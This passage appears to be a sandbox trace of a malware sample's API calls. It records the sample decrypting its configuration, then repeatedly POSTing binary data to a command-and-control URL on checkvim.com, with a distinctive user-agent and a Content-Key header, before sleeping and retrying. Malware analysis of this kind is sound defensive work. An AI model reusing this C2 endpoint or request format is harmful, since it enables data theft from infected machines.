szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0279.456] GetProcessHeap () returned 0x840000 [0279.456] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0279.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.457] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0279.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.459] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0279.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.460] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.460] GetProcessHeap () returned 0x840000 [0279.460] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0279.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.461] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0279.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.464] CryptDestroyKey (hKey=0x87e270) returned 1 [0279.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.466] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0279.466] GetProcessHeap () returned 0x840000 [0279.466] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0279.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.468] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0279.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.469] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0279.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.471] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0279.471] GetProcessHeap () returned 0x840000 [0279.471] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0279.471] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0279.475] GetProcessHeap () returned 0x840000 [0279.475] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0279.475] socket (af=2, type=1, protocol=6) returned 0x43c [0279.476] connect (s=0x43c, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0279.546] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0279.546] GetProcessHeap () returned 0x840000 [0279.546] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0279.546] GetProcessHeap () returned 0x840000 [0279.546] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0279.547] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0279.548] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0279.548] GetProcessHeap () returned 0x840000 [0279.548] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0279.549] GetProcessHeap () returned 0x840000 [0279.549] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0279.549] GetProcessHeap () returned 0x840000 [0279.549] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0279.549] GetProcessHeap () returned 0x840000 [0279.549] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0279.550] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0279.551] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0279.551] GetProcessHeap () returned 0x840000 [0279.551] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0279.551] GetProcessHeap () returned 0x840000 [0279.551] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0279.551] send (s=0x43c, buf=0x873a58*, len=237, flags=0) returned 237 [0279.552] send (s=0x43c, buf=0x87eb58*, len=159, flags=0) returned 159 [0279.552] GetProcessHeap () returned 0x840000 [0279.552] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0279.552] recv (in: s=0x43c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0279.908] GetProcessHeap () returned 0x840000 [0279.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0279.908] GetProcessHeap () returned 0x840000 [0279.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0279.908] GetProcessHeap () returned 0x840000 [0279.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0279.908] GetProcessHeap () returned 0x840000 [0279.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0279.908] closesocket (s=0x43c) returned 0 [0279.909] GetProcessHeap () returned 0x840000 [0279.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0279.909] GetProcessHeap () returned 0x840000 [0279.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0279.909] GetProcessHeap () returned 0x840000 [0279.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0279.909] GetProcessHeap () returned 0x840000 [0279.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0279.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x9f4) returned 0x43c [0279.911] Sleep (dwMilliseconds=0xea60) [0279.912] GetProcessHeap () returned 0x840000 [0279.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0279.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.913] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0279.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.925] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0279.931] GetProcessHeap () returned 0x840000 [0279.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0279.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.932] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0279.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.933] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0279.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.934] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.934] GetProcessHeap () returned 0x840000 [0279.934] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0279.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.935] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0279.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.936] CryptDestroyKey (hKey=0x87e370) returned 1 [0279.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.937] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0279.937] GetProcessHeap () returned 0x840000 [0279.937] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0279.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.938] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.939] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.940] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.941] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.941] GetProcessHeap () returned 0x840000 [0279.941] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0279.941] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0279.942] GetProcessHeap () returned 0x840000 [0279.942] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0279.942] GetProcessHeap () returned 0x840000 [0279.942] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0279.942] GetProcessHeap () returned 0x840000 [0279.942] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0279.942] GetProcessHeap () returned 0x840000 [0279.942] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0279.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.943] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0279.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.950] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0279.958] GetProcessHeap () returned 0x840000 [0279.958] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0279.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.960] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0279.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.961] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0279.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.962] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.962] GetProcessHeap () returned 0x840000 [0279.962] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0279.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.963] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0279.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.965] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0279.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.966] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0279.966] GetProcessHeap () returned 0x840000 [0279.966] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0279.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.967] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0279.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.969] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0279.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.970] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0279.970] GetProcessHeap () returned 0x840000 [0279.970] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0279.970] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0280.001] GetProcessHeap () returned 0x840000 [0280.001] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0280.001] socket (af=2, type=1, protocol=6) returned 0x440 [0280.002] connect (s=0x440, name=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0280.074] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0280.074] GetProcessHeap () returned 0x840000 [0280.074] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f798 [0280.074] GetProcessHeap () returned 0x840000 [0280.074] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0280.077] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0280.078] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0280.078] GetProcessHeap () returned 0x840000 [0280.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0280.078] GetProcessHeap () returned 0x840000 [0280.078] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0280.078] GetProcessHeap () returned 0x840000 [0280.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa28 [0280.078] GetProcessHeap () returned 0x840000 [0280.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0280.079] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0280.080] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0280.080] GetProcessHeap () returned 0x840000 [0280.080] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0280.080] GetProcessHeap () returned 0x840000 [0280.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0280.080] send (s=0x440, buf=0x873a58*, len=237, flags=0) returned 237 [0280.081] send (s=0x440, buf=0x87eb58*, len=159, flags=0) returned 159 [0280.081] GetProcessHeap () returned 0x840000 [0280.081] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0280.081] recv (in: s=0x440, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0280.449] GetProcessHeap () returned 0x840000 [0280.449] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0280.449] GetProcessHeap () returned 0x840000 [0280.449] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0280.449] GetProcessHeap () returned 0x840000 [0280.449] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0280.449] GetProcessHeap () returned 0x840000 [0280.449] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f798 | out: hHeap=0x840000) returned 1 [0280.450] closesocket (s=0x440) returned 0 [0280.450] GetProcessHeap () returned 0x840000 [0280.450] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0280.450] GetProcessHeap () returned 0x840000 [0280.451] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0280.451] GetProcessHeap () returned 0x840000 [0280.451] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0280.451] GetProcessHeap () returned 0x840000 [0280.451] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0280.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x9a4) returned 0x440 [0280.454] Sleep (dwMilliseconds=0xea60) [0280.456] GetProcessHeap () returned 0x840000 [0280.456] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0280.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.457] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0280.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.462] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0280.468] GetProcessHeap () returned 0x840000 [0280.468] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0280.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.469] CryptImportKey (in: hProv=0x86f248, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0280.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.470] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0280.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.471] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.471] GetProcessHeap () returned 0x840000 [0280.471] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0280.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.472] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0280.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.473] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0280.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.474] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0280.474] GetProcessHeap () returned 0x840000 [0280.475] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0280.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0280.476] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0280.476] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0280.477] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0280.478] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.478] GetProcessHeap () returned 0x840000 [0280.478] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0280.478] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0280.478] GetProcessHeap () returned 0x840000 [0280.478] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0280.479] GetProcessHeap () returned 0x840000 [0280.479] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0280.479] GetProcessHeap () returned 0x840000 [0280.479] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0280.479] GetProcessHeap () returned 0x840000 [0280.479] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0280.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.480] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0280.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.485] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0280.491] GetProcessHeap () returned 0x840000 [0280.491] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0280.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.492] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0280.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.493] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0280.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.494] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.494] GetProcessHeap () returned 0x840000 [0280.494] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0280.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.494] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0280.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.495] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0280.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0280.496] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0280.496] GetProcessHeap () returned 0x840000 [0280.496] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0280.497] LoadLibraryW 